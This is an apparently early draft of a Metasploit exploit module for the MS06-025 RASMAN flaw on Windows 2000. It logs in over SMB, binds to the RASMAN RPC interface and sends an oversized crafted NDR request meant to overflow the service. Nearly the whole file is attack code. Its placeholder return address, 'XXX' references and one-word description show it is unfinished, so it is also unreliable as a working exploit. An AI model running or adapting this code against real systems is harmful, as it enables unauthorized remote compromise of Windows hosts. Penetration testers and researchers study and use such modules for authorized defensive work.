metasploit-framework/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb

128 lines
3.1 KiB
Ruby
Raw Normal View History

require 'msf/core'
module Msf
class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
include Exploit::Remote::DCERPC
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft RASMAN MS06-025',
'Description' => %q{
RASMAN!
},
'Author' => [ 'pusscat' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 0.1 $',
'References' =>
[
[ 'OSVDB', 'XXX'],
[ 'CVE', 'XXX'],
[ 'MSB', 'MS06-025'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00", # \ / . : $ NULL
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP4', { 'Ret' => 0x41414141 } ],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
], self.class)
end
def exploit
connect()
smb_login()
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle}")
dcerpc_bind(handle)
print_status("Bound to #{handle}")
type2 =
NDR.wstring("A" * 34) + # 34 length
NDR.wstring("B" * 258) + # 258 length
NDR.wstring("C" * 258) + # 258 length
NDR.long(1) +
NDR.long(1)
#fuxorstring = "G" * 212 + "\\\\" + "g" * 43
#fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion"
fuxorstring = "G" * 552
type1 =
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) + type2 + # unique type 2
NDR.wstring("D" * 258) + # 258 length
NDR.long(1) +
NDR.wstring("E" * 520) + # 520 length
#NDR.wstring("F" * 86 + "\\" + "f" * 86 + "\\" + "F" * 86) + # 260 length
NDR.wstring("F" * 520) + # 520 length
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
#NDR.wstring(Rex::Text.pattern_create(257)) + # 257 length
NDR.wstring(fuxorstring) + # 514 length
NDR.long(0) +
NDR.long(0)
stubdata = type1 + NDR.long(1)
print_status('Calling the vulnerable function...')
begin
response = dcerpc.call(0xA, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end
end